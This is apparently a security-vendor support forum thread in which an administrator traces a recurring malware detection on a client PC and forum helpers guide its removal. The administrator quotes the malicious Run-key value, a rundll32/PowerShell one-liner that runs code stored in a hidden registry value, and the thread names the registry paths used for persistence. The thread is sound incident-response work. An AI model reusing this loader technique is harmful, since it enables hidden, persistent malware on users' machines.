Jump to content

Recommended Posts

This keeps showing up in one of our client machines in registry with the Registry scanner Detection engine 20939 (20200303) :

Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8

  \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

the ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this?  Or what else should I do next?

Share this post


Link to post
Share on other sites
14 minutes ago, Carl S said:

\REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

Share this post


Link to post
Share on other sites
10 minutes ago, itman said:

Did you manually check what's in that registry key? Display a screen shot of what's in the key.

When I search for that key I don't find it in regedit.

Share this post


Link to post
Share on other sites

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Share this post


Link to post
Share on other sites

Please provide ESET Log Collector logs from the machine.

Share this post


Link to post
Share on other sites
16 hours ago, itman said:

Search for:

HKEY_USERS\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run

Duh, didn't catch that, I just cut and pasted.  Thanks.

Share this post


Link to post
Share on other sites

OK, found it by navigating to it.  Could not get search to work.

 

In the meantime, I have ESET client issues on that machine, probably due to my own fault.  :(

Share this post


Link to post
Share on other sites
50 minutes ago, Carl S said:

OK, found it by navigating to it.  Could not get search to work.

So was there anything present in that registry key?

Share this post


Link to post
Share on other sites

The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

Share this post


Link to post
Share on other sites
12 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Working on this.  I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent.  Now up and running again, and will get the logs.  (Ok, it's collecting right now)

It's been years since I've submitted these type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.

Share this post


Link to post
Share on other sites
13 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Hmm.  I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."

Share this post


Link to post
Share on other sites
Posted (edited)
1 hour ago, Carl S said:

The suspicious part seems to be:

 

key: authHost

value:
rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))

 

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Edited by itman

Share this post


Link to post
Share on other sites
21 minutes ago, itman said:

I would say it is malicious.

To be on the safe side, export the reg. key to a save location. Then delete this crud. If for some very remote reason removing the crud causes system issues, you can always import the reg. key to restore it.

Note that authhost.exe is a legit Win system process, but that is obviously what is not running here.

Am I deleting the whole key / value pair or the value and leaving the key?

Share this post


Link to post
Share on other sites
14 hours ago, Marcos said:

Please provide ESET Log Collector logs from the machine.

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

Share this post


Link to post
Share on other sites
Posted (edited)
44 minutes ago, Carl S said:

Am I deleting the whole key / value pair or the value and leaving the key?

I believe what is shown in your reg. key is this:

Eset_Reg_Malware.png.1b14ef647a1bb7f6506bf6db84e0a873.png

BTW - when I tried to enter the rundll.exe code as data, Eset immmediately detected it as the PowerShell malware detection you're receiving. Hence, it doesn't display in the screen shot.

Anyway, you will be deleting "authHost" which BTW is not a registry key. It is a String value. Deleting authHost will also remove any data associated with it which is the malicious code.

Edited by itman

Share this post


Link to post
Share on other sites

I suspect what the malware did was a registry Import or equivalent to get around Eset's detection of the malicious code.

Share this post


Link to post
Share on other sites
Posted (edited)

Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

Edited by itman

Share this post


Link to post
Share on other sites
10 hours ago, Carl S said:

Marcos, I re-ran the collector on a whim, and this time, it worked.  I now have the zip file ready.

You can upload it here, only ESET staff and the poster have access to attachments granted. Alternatively you can upload the archive to a safe location and drop me a personal message with a download link.

Share this post


Link to post
Share on other sites
14 hours ago, itman said:

Also checkout this reg key: HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E .This is what the PowerShell script was using.

Have a feeling the "D4062752-23C4-26DB-4D48-07BAD1FC2B8E" sub-key has to go along with possibly the actual D4062752-23C4-26DB-4D48-07BAD1FC2B8E key itself.

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

Share this post


Link to post
Share on other sites

Hi Marcos, here is attachment.

I removed the value of the authHost line.  But other than that, everything else is the same.  FWIW, I have no new detections since the 4th.

10485-baker01-ees_logs.zip

Share this post


Link to post
Share on other sites
Just now, Carl S said:

I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

Share this post


Link to post
Share on other sites
12 minutes ago, itman said:

Just be careful about deleting stuff from the registry. Either back it up first, or export any keys being modified/deleted prior to any registry cleaning exercise.

Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.

Share this post


Link to post
Share on other sites

Please delete the following registry values and then reboot the machine:
HKU\S-1-5-21-3146671537-2346468688-2395455220-1182\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\authHos
HKCU\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E\Auxibrkr

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...